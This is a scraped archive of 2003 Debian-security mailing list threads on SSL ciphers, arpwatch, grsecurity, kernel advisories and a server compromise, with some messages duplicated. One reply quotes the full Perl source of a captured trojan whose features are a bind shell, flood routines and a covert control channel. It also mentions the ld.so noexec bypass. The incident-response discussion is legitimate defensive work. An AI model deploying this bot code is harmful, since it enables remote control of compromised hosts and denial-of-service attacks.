RE: OPENSSL
On Tue, Jun 10, Stefan Neufeind wrote: > I'm using a 128-bit-cert. You're using an X.509 certificate. The grade of symmetric encryption negotiated between browser and web server is (at least in theory) independent of the certificate. > But browsers that support less encryption > (e.g. IE that comes with WinNT4) can't access my SSL-pages because > the encryption doesn't allow degration. The original NT shipped with IE2. Are you sure you want people to still use that? > Is there any way to solve > this prob? Using Apache with an official SSL-cert. > > PS: This just came to my mind when you said "step-up" - cause in my > case it would be a "step-down", right? I could imagine that IE2 has numerous problems with SSL. It could well be one of the browsers that need to see step-up certificates before they perform 128-bit symmetric cryptography. But I don't know. Make sure you've allowed your Apache to use small key sizes first. I wouldn't use them, but you should be sure that it's not your server that's refusing to do e.g. 40-bit RC4. Then I'd urge the NT users to apply the latest service pack and preferrably install IE6SP1 plus the Hotfixes that have been released since. And then they should install a better browser and use that instead. ;-> Cheers, Tobias
Re: a weird script worm uploaded via php with debian 3.0 ?
On Tue, Jun 10, 2003 at 02:58:27PM -0500, Robert Ebright wrote: > Hello, > I logged in to my server today to find that > /usr/sbin/ncsd was running about 50 copies, > since I don't have BIND installed, obviously > something was up...they were also running with > the user www-data... > After a little bit of research I found a new > crontab entryFile: /tmp/crontab.LYukbF > 0 * * * * /tmp/.nscdrecover Hi I dont have any information about your trojan, but i can give you a solution (also a good security practice) Mount /tmp in a separate partition with the noexec flag in fstab This will disable most of the trojans Best regards -- Celso González http://bulmalug.net pgpt17oO6xoxf.pgp Description: PGP signature
Re: a weird script worm uploaded via php with debian 3.0 ?
On Wed, 11 Jun 2003, Celso González wrote: > I dont have any information about your trojan, but i can give you a > solution (also a good security practice) > > Mount /tmp in a separate partition with the noexec flag in fstab > > This will disable most of the trojans Sorry to delude you, but browse the archives: you will find that even with a noexec partition you can run any executable by just invoking /lib/ld.so /tmp/yourexecutable Bye Giacomo -- _ Giacomo Mulas <[EMAIL PROTECTED]> _ OSSERVATORIO ASTRONOMICO DI CAGLIARI Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA) Tel. (OAC): +39 070 71180 248 Fax : +39 070 71180 222 Tel. (UNICA): +39 070 675 4916 _ "When the storms are raging around you, stay right where you are" (Freddy Mercury) _
RE: OPENSSL
On 11 Jun 2003 at 6:59, Reckhard, Tobias wrote: > On Tue, Jun 10, Stefan Neufeind wrote: > > I'm using a 128-bit-cert. > > You're using an X.509 certificate. The grade of symmetric encryption > negotiated between browser and web server is (at least in theory) > independent of the certificate. > > > But browsers that support less encryption > > (e.g. IE that comes with WinNT4) can't access my SSL-pages because > > the encryption doesn't allow degration. > > The original NT shipped with IE2. Are you sure you want people to > still use that? Well, some people here still use it. Mainly for reading emails via webmail ... Users with original NT4 or some version of Mac OS are currently having problems accessing the webmail-interface. But I don't want to drop to http-without-SSL for webmail. And I can't install new browser versions on those machines since I don't administrate them. So for now these users can't view there emails from that machines. > > Is there any way to solve > > this prob? Using Apache with an official SSL-cert. > > > > PS: This just came to my mind when you said "step-up" - cause in my > > case it would be a "step-down", right? > > I could imagine that IE2 has numerous problems with SSL. It could well > be one of the browsers that need to see step-up certificates before > they perform 128-bit symmetric cryptography. But I don't know. > > Make sure you've allowed your Apache to use small key sizes first. I > wouldn't use them, but you should be sure that it's not your server > that's refusing to do e.g. 40-bit RC4. Then I'd urge the NT users to > apply the latest service pack and preferrably install IE6SP1 plus the > Hotfixes that have been released since. Will have a look at that. Funny thing: Users can view the first page (login-page) but afterwards can't login. Maybe it has got something to do with keepalives or anything?!? > And then they should install a better browser and use that instead. > ;-> Read statement above. Would REALLY like to do that if I could.
Re: a weird script worm uploaded via php with debian 3.0 ?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Wed, 11 Jun 2003 at 10:47:49AM +0200, Giacomo Mulas wrote: > On Wed, 11 Jun 2003, Celso Gonz?lez wrote: > > > I dont have any information about your trojan, but i can give you a > > solution (also a good security practice) > > > > Mount /tmp in a separate partition with the noexec flag in fstab > > > > This will disable most of the trojans > > Sorry to delude you, but browse the archives: you will find that even with > a noexec partition you can run any executable by just invoking > > /lib/ld.so /tmp/yourexecutable While I agree with your observation I feel compelled to defend his point. He said mounting /tmp will stop MOST Trojans. While it might not stop a trojan planted by a person, it will stop a trojan planted by a worm (which is what this thread is about) since the author of the worm might not have had the insight to use ld.so. Take care, - -- Phillip Hofmeister PGP/GPG Key: http://www.zionlth.org/~plhofmei/ wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import - -- Excuse #66: Unoptimized hard drive -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE+5yG/S3Jybf3L5MQRAtz3AJ4oU0nYQytble771jtm9XdoTateOACdFSGD qcSmvXIQBxHUQlgrf5o/ui0= =BVu8 -END PGP SIGNATURE-
Re: a weird script worm uploaded via php with debian 3.0 ?
On Wed, 11 Jun 2003, Phillip Hofmeister wrote: > While I agree with your observation I feel compelled to defend his > point. > > He said mounting /tmp will stop MOST Trojans. While it might not stop a > trojan planted by a person, it will stop a trojan planted by a worm > (which is what this thread is about) since the author of the worm might > not have had the insight to use ld.so. I see what you mean, in this sense he is obviously right. Bye Giacomo -- _ Giacomo Mulas <[EMAIL PROTECTED]> _ OSSERVATORIO ASTRONOMICO DI CAGLIARI Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA) Tel. (OAC): +39 070 71180 248 Fax : +39 070 71180 222 Tel. (UNICA): +39 070 675 4916 _ "When the storms are raging around you, stay right where you are" (Freddy Mercury) _
RE: a weird script worm uploaded via php with debian 3.0 ?
> While I agree with your observation I feel compelled to > defend his point. > > He said mounting /tmp will stop MOST Trojans. While it might > not stop a trojan planted by a person, it will stop a trojan > planted by a worm (which is what this thread is about) since > the author of the worm might not have had the insight to use ld.so. > A good solution, not too hard to implement, is to patch your kernel with grsecurity. Grsecurity provides a very good level of protection against buffer overflow attacks, It randomizes PIDs, it protects chroots, enforces the TCP/IP stack, etc. Grsecurity is actually a cumulative patch from Pax, some OpenBSD TCP/IP stuff ported into linux, openwall, HAP-linux. Btw it is very configurable, and pretty well documented, at configuration level. I use it and am very happy with it. If I trust archives from this list, I am not the only one in this case :-) http://www.grsecurity.net
Re: a weird script worm uploaded via php with debian 3.0 ?
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi
On Tuesday 10 June 2003 21:58, Robert Ebright wrote:
Have you copy to the new server the home directory of the user www-data?
in debian is located in the root directory of the web server, so if you have
copy the document root from the old server yo have copy all the dot files for
the user , and rather possible you have copy the crontab file of www-data.
If you look syslog entries you can figure out how the worm replicates himself
and how the rootkit is enabled ( only guessing )
> and under SYSLOG it starts
>
the systems find a crontab for the user www-data
user www-data has exec the command crontab -l
> syslog.3:Jun 6 16:27:27 debian crontab[26795]:
> (www-data) LIST (www-data)
and have replaced the file
>syslog.3:Jun 6
> 16:27:28 debiancrontab[26798]:
> (www-data) REPLACE (www-data)
hummm, maybe he isn't very smart, www-data have do it again
>syslog.3:Jun 6
> 16:27:34debian crontab[26804]:
> (www-data) LIST (www-data)syslog.3:Jun 6
> 16:27:34 debiancrontab[26807]:
> (www-data) REPLACE (www-data)
cron sees the new crontab file for www-data , read the file, and execute the
commands...
>syslog.3:Jun 6
> 17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD
> (/tmp/.nscdrecover)
>
hummm you have to figure out how the /tmp/.nscdrecover has been
copy, is difficult to say but maybe another www-data crontab entry of the
user www-data starts the work who knows...
> so I found /tmp/.ncsdrecover and it looks like
> some kind of port scanner/trojan
>
it sounds like a local exploit against nscd which is trying to get a root
shell and put it on the wire
> the contents are pasted below
>
>
> #!/usr/bin/perl -w
>
> $pass = "J9YcGEyNypkzI";
> $str = 'Mess with the best - die like a
> rest!'x1337;
> use IO::Socket;
> use IO::Select;
> use POSIX;
>
> sub redir
> {
> my $port = shift;
> my $dest = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> $sa = IO::Socket::INET->new( Proto => "tcp",
> Listen => 1, ReuseAddr => 1,
> LocalPort =>$port) or exit;
> $sin = $sa->accept or exit;
> close($sa);
> alarm 0;
> $sout = IO::Socket::INET->new( Proto => "tcp",
> PeerAddr => $dest) or exit;$sin->autoflush(1);
> $sout->autoflush(1);
> $sel = IO::Select->new($sin, $sout);
> while(@sock = $sel->can_read(180)) {
> foreach $s(@sock) {
> $buf = <$s>; exit unless($buf);
> print $sout $buf if($s eq $sin);
> print $sin $buf if($s eq $sout);
> }}}
>
> sub shell
> {
> my $port = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> use Socket;
> socket(S, PF_INET, SOCK_STREAM, 0);
> setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
> bind(S, sockaddr_in($port, INADDR_ANY));
> listen(S, 1);
> accept(X, S);
> close(S);
> alarm 0;
> open STDIN, "<&X";
> open STDOUT, ">&X";
> open STDERR, ">&X";
> close X;
> exec("/bin/sh");
> }
>
> sub udp
> {
> my $host = shift;
> my $time = shift;
> $sock = IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $host,
> PeerPort => int(rand 65535))
> or exit;
> $sock->autoflush(1);$SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> print $sock $str while(1);
> }
> }
>
> sub ddns
> {
> my $host = shift;
> my $time = shift;
> $sock = new IO::Socket::INET->new(Proto
> => 'udp', PeerAddr => $host,
> PeerPort => 53) or exit;
> $sock->autoflush(1);
> $SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> while(1) {
> my $s = int(rand(89)+10);
> my $r1 = int(rand(89)+10);
> my $r2 = int(rand(89)+10);
> my $r3 = int(rand(89)+10);
> my $r4 = int(rand(89)+10);
>
> send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3
>\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
>
> $0 = '/usr/sbin/nscd'.' 'x100;
> exit if fork;
> $SIG{ALRM} = 'IGNORE';
> $SIG{TERM} = 'IGNORE';
> $SIG{CHLD} = 'IGNORE';
> $SIG{INT} = 'IGNORE';
> $SIG{QUIT} = 'IGNORE';
> $SIG{HUP} = 'IGNORE';
> open STDIN, " open STDOUT, ">/dev/null";
> open STDERR, ">/dev/null";
> POSIX::setsid();
>
> $csock = IO::Socket::INET->new(Proto => 'udp',
> LocalPort => 1337, ReuseAddr => 1) or
> exit;while($string =<$csock>)
> {
> chop($string);
> my ($pw, $cmd, $arg1, $arg2) = split "
> ", $string;next unless($cmd);
> next unless($arg1);
> next unless(crypt($pw, $pass) eq $pass);
> if ($cmd eq "ping") {
> my $bsock =
> IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $arg1,
> PeerPort => $arg2,
> ReuseAddr => 1) or
> next;
> print $bsock"pong
> ".`uname -mnrs`; close $bsock;
>
2.5 and grsec [was Re: a weird script worm uploaded via php with debian 3.0 ?]
On Wed, Jun 11, 2003 at 03:24:11PM +0200, DEFFONTAINES Vincent wrote: > I use it and am very happy with it. If I trust archives from this list, I am > not > the only one in this case :-) Is anyone using it with 2.5? I'm on the cusp of switching a few machines to it to get up the learning curve before 2.6 comes to pass. I would not think a 2.4 patchset would have much chance of working against it...
arpwatch exclusion ?
Hello all. I am using arpwatch, but I use a few machines with 2 ethernet cards, and they often flip-flop... As I know them, I want to exclude the flip-flop mails from my mailbox... How could I tune arpwatch so that it does not listen to those flip-flops, or it does not send mails for these ? Thank you ! -- Jacques Foury
Re: arpwatch exclusion ?
On Wed, 11 Jun 2003, Jacques Foury wrote: > Date: Wed, 11 Jun 2003 17:50:14 +0200 > From: Jacques Foury <[EMAIL PROTECTED]> > To: debian-security@lists.debian.org > Subject: arpwatch exclusion ? > Resent-Date: Wed, 11 Jun 2003 11:10:48 -0500 (CDT) > Resent-From: debian-security@lists.debian.org > > Hello all. > > I am using arpwatch, but I use a few machines with 2 ethernet cards, and > they often flip-flop... As I know them, I want to exclude the flip-flop > mails from my mailbox... > > How could I tune arpwatch so that it does not listen to those > flip-flops, or it does not send mails for these ? Well you will have almost the same mail content/header sending from arpwatch. So why not use your mail-filter to filter out this kind of mail? No need to fix arpwatch, it suppose to work that way. cj > > Thank you ! > > -- > Jacques Foury > > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > >
Re: apache
Martynas Domarkas wrote: Yes, of course. But in this case I will invoke rotatelogs... I don't like it. Martynas: three people now have given you advice on how to fix your "problem" three different ways. Apache doesn't have this behaviour: in fact, the apache foundation suggests you use cronolog: http://httpd.apache.org/docs/logs.html#piped If you dont' like this behaviour, take it up on the apache lists, although it's been discussed before. glen -- Glen Mehn [EMAIL PROTECTED] "if you ever swallow the universe, remember to spit the dragon back out.xx.--swan
Re: kernel-source 2.4.20 + grsecurity + freeswan
Le jeu, Jun 05, 2003 a 21:50:33 -0400, Hubert Chan a écrit: > > "Vinai" == Vinai Kopp <[EMAIL PROTECTED]> writes: > > [...] > > Vinai> There seem to be problems using both the grsecurity and the > Vinai> freeswan patches (at least I haven't been successfull applying > Vinai> the patches - I tried the debian versions and the "official" ones > Vinai> from the different project sites of the patches and the kernel > Vinai> sources). > > I have a Debian/sid machine running a 2.4.20 kernel with both patches > applied (along with a whole bunch of other patches), and had no problems > applying the patches. The patches and kernel sources I got from the sid > repository maybe about a month ago. I would imagine that there > shouldn't be much of an issue using the patches and kernel sources from > sid on a stable box. do you happen to have XFS patched onto that kernel? :) and what was the order of the patching? eric (infrequent poster) > -- > Hubert Chan <[EMAIL PROTECTED]> - http://www.uhoreg.ca/ > PGP/GnuPG key: 1024D/124B61FA > Fingerprint: 96C5 012F 5F74 A5F7 1FF7 5291 AF29 C719 124B 61FA > Key available at wwwkeys.pgp.net. Encrypted e-mail preferred. -- UNIX is user friendly, it's just picky about who its friends are. --- ,''`. http://www.debian.org/ | http://www.nuit.ca/ : :' : Debian GNU/Linux| http://simonraven.nuit.ca/ `. `' | PGP key ID: 6169 BE0C 0891 A038 `- |
Re: arpwatch exclusion ?
In article <[EMAIL PROTECTED]> [EMAIL PROTECTED] writes: >I am using arpwatch, but I use a few machines with 2 ethernet cards, and >they often flip-flop... As I know them, I want to exclude the flip-flop >mails from my mailbox... > >How could I tune arpwatch so that it does not listen to those >flip-flops, or it does not send mails for these ? Use the "-s program" option to send the "mail" via a program that does whatever filtering you want. I'm filtering out the proxy-arp responces this way. (There are hundreds of them every day on my firewall.) Unless you know all flip-flops will be noise, I'd recomend only filtering the ones you know about. -- Blars Blarson [EMAIL PROTECTED] http://www.blars.org/blars.html "Text is a way we cheat time." -- Patrick Nielsen Hayden
atftpd vulnerability and patch?
http://packetstorm.linuxsecurity.com/filedesc/atftpdx.c.html says: Proof
of concept remote root exploit for atftpd version 0.6. Makes use of the
filename overflow found by Rick Patel. Related post here. Tested against
Debian 3.0. By gunzip
http://packetstorm.linuxsecurity.com/filedesc/atftpd.patch.html says:
Simple patch to fix the overflow found in atftpd by Rick Patel. By gunzip
The patch is:
--- tftpd_file.cTue Mar 12 05:26:18 2002
+++ tftpd_file_diff.c Thu Jun 5 20:31:06 2003
@@ -357,7 +357,8 @@
else
{
strcpy(filename, directory);
- strncat(filename, data->tftp_options[OPT_FILENAME].value, VAL_SIZE);
+ strncat(filename, data->tftp_options[OPT_FILENAME].value,
+ VAL_SIZE - strlen( directory ) - 1 );
}
/* If the filename contain /../ sequences, we forbid the access */
http://packages.qa.debian.org/a/atftp.html shows:
[2002-04-24] Accepted atftp 0.6.1.1 (source hppa)
[2002-04-13] Accepted atftp 0.6.1 (i386 source)
[2002-03-31] Accepted atftp 0.6 (i386 source)
[2002-02-11] Installed atftp 0.5 (i386 source)
[2001-07-21] Installed atftp 0.4 (i386 source)
[2001-03-05] Installed atftp 0.3 (i386 source)
[2000-12-27] Installed atftp 0.2 (i386 source)
[2000-08-21] Installed atftp 0.1 (source i386)
and:
Testing 0.6.1.1
Stable 0.6
I'm guessing atftp is vulnerable, but without checking I won't file a bug.
Checking the code should be easy, but checking if this could actualy be
exploited would take a bit more thought. If stable is actualy vulnerable
and exploitable then the security team should be co-ordinated with.
Drew Daniels
grsecurity vs lsm vs lids
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OK, I have been seeing lots of people on this list recommend using the grsecurity kernel patch. Now I want to give it a go, but I see that there is also a lsm patch and I also remember lids being recommended in the past by others. I would like to learn the interface to what is going to become the standard in future kernels. I read something while googling that suggested that lsm seems to be the way that the kernel is heading. What do people on this list recommend? Regards. Mark. -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE+57clL/zYpWVgapgRAhvoAKCjWWfzCxbep+JNTjJHQaj8zhKL3ACffk8U n3GzkQ/8/xFevGntrlpfpFc= =D0BX -END PGP SIGNATURE-
Kernel Security Fixes
Hi, just got an announcement from the mandrake security list. Could please someone of the people with a deeper knowledge explain, if the mentioned issues are addressed in one of the "stock" debian kernels or if I have to get the sources from kernel.org and patch it myself? Mandrake Linux Security Update Advisory Multiple vulnerabilities were discovered and fixed in the Linux kernel. * CAN-2003-0001: Multiple ethernet network card drivers do not pad frames with null bytes which allows remote attackers to obtain information from previous packets or kernel memory by using special malformed packets. * CAN-2003-0244: The route cache implementation in the 2.4 kernel and the Netfilter IP conntrack module allows remote attackers to cause a Denial of Service (DoS) via CPU consumption due to packets with forged source addresses that cause a large number of hash table collisions related to the PREROUTING chain. * CAN-2003-0246: The ioperm implementation in 2.4.20 and earlier kernels does not properly restrict privileges, which allows local users to gain read or write access to certain I/O ports. * CAN-2003-0247: A vulnerability in the TTY layer of the 2.4 kernel allows attackers to cause a kernel oops resulting in a DoS. * CAN-2003-0248: The mxcsr code in the 2.4 kernel allows attackers to modify CPU state registers via a malformed address. Thank you very uch for your attention! Have a nice thread, Peter
Re: Kernel Security Fixes
On Thu, Jun 12, 2003 at 01:18:59AM +0200, Peter Holm wrote: > Could please someone of the people with a deeper knowledge explain, if > the mentioned issues are addressed in one of the "stock" debian > kernels or if I have to get the sources from kernel.org and patch it > myself? See DSA 311-1 at http://www.debian.org/security/2003/dsa-311 -- ___ | Web: http://web.morgul.net/~frodo/ | PGP Public Key: http://web.morgul.net/~frodo/mail.html pgpW25wQTf04u.pgp Description: PGP signature
Re: cronjob stuck
Have you tried checking the root crontab? not a normal place to put stuff, but worth checking out anyway... Regards, William On Tue, 10 Jun 2003, Dale Amon wrote: > Just ran across an interesting prob, wondered if > anyone else has seen it. I added a repeating entry > to /etc/cron.d/foo that ran every */5 minutes. I > then tried to get rid of it... It will not die. > > I moved the file out of /etc/cron.d and it still > is running. > > I cp'd the file and deleted the old one in case > cron remembered the inode (rather a long shot). > No change. > > I did /etc/init.d/cron stop; /etc/init.d/cron start; > still it repeats. > > I did updatedb and locate cron; can't find it cached > anywhere. > > cron doesn't seem to have any flush options and no > indication that it should be caching across executions. > > I could certainly (I hope!) get rid of it by rebooting > but I can't do that with this system at this time. > > Has anyone else had trouble making vixie cron STFU? Am > I hallucinating? Is my brain in need of Coke and M&M's? > > -- > -- >IN MY NAME:Dale Amon, CEO/MD > No Mushroom clouds over Islandone Society > London and New York. www.islandone.org > -- > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > >
Re: cronjob stuck
On Thu, Jun 12, 2003 at 11:55:00AM +1000, William Law wrote: > Have you tried checking the root crontab? not a normal place to put stuff, > but worth checking out anyway... Yeah, I'd checked everything. Just didn't account for pure blind bad luck chance :-) (you probably read my second post by now)
Re: a weird script worm uploaded via php with debian 3.0 ?
On Tue, Jun 10, 2003 at 02:58:27PM -0500, Robert Ebright wrote: > Hello, > I logged in to my server today to find that > /usr/sbin/ncsd was running about 50 copies, > since I don't have BIND installed, obviously > something was up...they were also running with > the user www-data... > After a little bit of research I found a new > crontab entryFile: /tmp/crontab.LYukbF > 0 * * * * /tmp/.nscdrecover Hi I dont have any information about your trojan, but i can give you a solution (also a good security practice) Mount /tmp in a separate partition with the noexec flag in fstab This will disable most of the trojans Best regards -- Celso González http://bulmalug.net pgp0.pgp Description: PGP signature
Re: a weird script worm uploaded via php with debian 3.0 ?
On Wed, 11 Jun 2003, Celso González wrote: > I dont have any information about your trojan, but i can give you a > solution (also a good security practice) > > Mount /tmp in a separate partition with the noexec flag in fstab > > This will disable most of the trojans Sorry to delude you, but browse the archives: you will find that even with a noexec partition you can run any executable by just invoking /lib/ld.so /tmp/yourexecutable Bye Giacomo -- _ Giacomo Mulas <[EMAIL PROTECTED]> _ OSSERVATORIO ASTRONOMICO DI CAGLIARI Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA) Tel. (OAC): +39 070 71180 248 Fax : +39 070 71180 222 Tel. (UNICA): +39 070 675 4916 _ "When the storms are raging around you, stay right where you are" (Freddy Mercury) _ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: OPENSSL
On 11 Jun 2003 at 6:59, Reckhard, Tobias wrote: > On Tue, Jun 10, Stefan Neufeind wrote: > > I'm using a 128-bit-cert. > > You're using an X.509 certificate. The grade of symmetric encryption > negotiated between browser and web server is (at least in theory) > independent of the certificate. > > > But browsers that support less encryption > > (e.g. IE that comes with WinNT4) can't access my SSL-pages because > > the encryption doesn't allow degration. > > The original NT shipped with IE2. Are you sure you want people to > still use that? Well, some people here still use it. Mainly for reading emails via webmail ... Users with original NT4 or some version of Mac OS are currently having problems accessing the webmail-interface. But I don't want to drop to http-without-SSL for webmail. And I can't install new browser versions on those machines since I don't administrate them. So for now these users can't view there emails from that machines. > > Is there any way to solve > > this prob? Using Apache with an official SSL-cert. > > > > PS: This just came to my mind when you said "step-up" - cause in my > > case it would be a "step-down", right? > > I could imagine that IE2 has numerous problems with SSL. It could well > be one of the browsers that need to see step-up certificates before > they perform 128-bit symmetric cryptography. But I don't know. > > Make sure you've allowed your Apache to use small key sizes first. I > wouldn't use them, but you should be sure that it's not your server > that's refusing to do e.g. 40-bit RC4. Then I'd urge the NT users to > apply the latest service pack and preferrably install IE6SP1 plus the > Hotfixes that have been released since. Will have a look at that. Funny thing: Users can view the first page (login-page) but afterwards can't login. Maybe it has got something to do with keepalives or anything?!? > And then they should install a better browser and use that instead. > ;-> Read statement above. Would REALLY like to do that if I could. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: a weird script worm uploaded via php with debian 3.0 ?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Wed, 11 Jun 2003 at 10:47:49AM +0200, Giacomo Mulas wrote: > On Wed, 11 Jun 2003, Celso Gonz?lez wrote: > > > I dont have any information about your trojan, but i can give you a > > solution (also a good security practice) > > > > Mount /tmp in a separate partition with the noexec flag in fstab > > > > This will disable most of the trojans > > Sorry to delude you, but browse the archives: you will find that even with > a noexec partition you can run any executable by just invoking > > /lib/ld.so /tmp/yourexecutable While I agree with your observation I feel compelled to defend his point. He said mounting /tmp will stop MOST Trojans. While it might not stop a trojan planted by a person, it will stop a trojan planted by a worm (which is what this thread is about) since the author of the worm might not have had the insight to use ld.so. Take care, - -- Phillip Hofmeister PGP/GPG Key: http://www.zionlth.org/~plhofmei/ wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import - -- Excuse #66: Unoptimized hard drive -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE+5yG/S3Jybf3L5MQRAtz3AJ4oU0nYQytble771jtm9XdoTateOACdFSGD qcSmvXIQBxHUQlgrf5o/ui0= =BVu8 -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: a weird script worm uploaded via php with debian 3.0 ?
On Wed, 11 Jun 2003, Phillip Hofmeister wrote: > While I agree with your observation I feel compelled to defend his > point. > > He said mounting /tmp will stop MOST Trojans. While it might not stop a > trojan planted by a person, it will stop a trojan planted by a worm > (which is what this thread is about) since the author of the worm might > not have had the insight to use ld.so. I see what you mean, in this sense he is obviously right. Bye Giacomo -- _ Giacomo Mulas <[EMAIL PROTECTED]> _ OSSERVATORIO ASTRONOMICO DI CAGLIARI Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA) Tel. (OAC): +39 070 71180 248 Fax : +39 070 71180 222 Tel. (UNICA): +39 070 675 4916 _ "When the storms are raging around you, stay right where you are" (Freddy Mercury) _ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: a weird script worm uploaded via php with debian 3.0 ?
> While I agree with your observation I feel compelled to > defend his point. > > He said mounting /tmp will stop MOST Trojans. While it might > not stop a trojan planted by a person, it will stop a trojan > planted by a worm (which is what this thread is about) since > the author of the worm might not have had the insight to use ld.so. > A good solution, not too hard to implement, is to patch your kernel with grsecurity. Grsecurity provides a very good level of protection against buffer overflow attacks, It randomizes PIDs, it protects chroots, enforces the TCP/IP stack, etc. Grsecurity is actually a cumulative patch from Pax, some OpenBSD TCP/IP stuff ported into linux, openwall, HAP-linux. Btw it is very configurable, and pretty well documented, at configuration level. I use it and am very happy with it. If I trust archives from this list, I am not the only one in this case :-) http://www.grsecurity.net -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: a weird script worm uploaded via php with debian 3.0 ?
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi
On Tuesday 10 June 2003 21:58, Robert Ebright wrote:
Have you copy to the new server the home directory of the user www-data?
in debian is located in the root directory of the web server, so if you have
copy the document root from the old server yo have copy all the dot files for
the user , and rather possible you have copy the crontab file of www-data.
If you look syslog entries you can figure out how the worm replicates himself
and how the rootkit is enabled ( only guessing )
> and under SYSLOG it starts
>
the systems find a crontab for the user www-data
user www-data has exec the command crontab -l
> syslog.3:Jun 6 16:27:27 debian crontab[26795]:
> (www-data) LIST (www-data)
and have replaced the file
>syslog.3:Jun 6
> 16:27:28 debiancrontab[26798]:
> (www-data) REPLACE (www-data)
hummm, maybe he isn't very smart, www-data have do it again
>syslog.3:Jun 6
> 16:27:34debian crontab[26804]:
> (www-data) LIST (www-data)syslog.3:Jun 6
> 16:27:34 debiancrontab[26807]:
> (www-data) REPLACE (www-data)
cron sees the new crontab file for www-data , read the file, and execute the
commands...
>syslog.3:Jun 6
> 17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD
> (/tmp/.nscdrecover)
>
hummm you have to figure out how the /tmp/.nscdrecover has been
copy, is difficult to say but maybe another www-data crontab entry of the
user www-data starts the work who knows...
> so I found /tmp/.ncsdrecover and it looks like
> some kind of port scanner/trojan
>
it sounds like a local exploit against nscd which is trying to get a root
shell and put it on the wire
> the contents are pasted below
>
>
> #!/usr/bin/perl -w
>
> $pass = "J9YcGEyNypkzI";
> $str = 'Mess with the best - die like a
> rest!'x1337;
> use IO::Socket;
> use IO::Select;
> use POSIX;
>
> sub redir
> {
> my $port = shift;
> my $dest = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> $sa = IO::Socket::INET->new( Proto => "tcp",
> Listen => 1, ReuseAddr => 1,
> LocalPort =>$port) or exit;
> $sin = $sa->accept or exit;
> close($sa);
> alarm 0;
> $sout = IO::Socket::INET->new( Proto => "tcp",
> PeerAddr => $dest) or exit;$sin->autoflush(1);
> $sout->autoflush(1);
> $sel = IO::Select->new($sin, $sout);
> while(@sock = $sel->can_read(180)) {
> foreach $s(@sock) {
> $buf = <$s>; exit unless($buf);
> print $sout $buf if($s eq $sin);
> print $sin $buf if($s eq $sout);
> }}}
>
> sub shell
> {
> my $port = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> use Socket;
> socket(S, PF_INET, SOCK_STREAM, 0);
> setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
> bind(S, sockaddr_in($port, INADDR_ANY));
> listen(S, 1);
> accept(X, S);
> close(S);
> alarm 0;
> open STDIN, "<&X";
> open STDOUT, ">&X";
> open STDERR, ">&X";
> close X;
> exec("/bin/sh");
> }
>
> sub udp
> {
> my $host = shift;
> my $time = shift;
> $sock = IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $host,
> PeerPort => int(rand 65535))
> or exit;
> $sock->autoflush(1);$SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> print $sock $str while(1);
> }
> }
>
> sub ddns
> {
> my $host = shift;
> my $time = shift;
> $sock = new IO::Socket::INET->new(Proto
> => 'udp', PeerAddr => $host,
> PeerPort => 53) or exit;
> $sock->autoflush(1);
> $SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> while(1) {
> my $s = int(rand(89)+10);
> my $r1 = int(rand(89)+10);
> my $r2 = int(rand(89)+10);
> my $r3 = int(rand(89)+10);
> my $r4 = int(rand(89)+10);
>
> send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3
>\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
>
> $0 = '/usr/sbin/nscd'.' 'x100;
> exit if fork;
> $SIG{ALRM} = 'IGNORE';
> $SIG{TERM} = 'IGNORE';
> $SIG{CHLD} = 'IGNORE';
> $SIG{INT} = 'IGNORE';
> $SIG{QUIT} = 'IGNORE';
> $SIG{HUP} = 'IGNORE';
> open STDIN, " open STDOUT, ">/dev/null";
> open STDERR, ">/dev/null";
> POSIX::setsid();
>
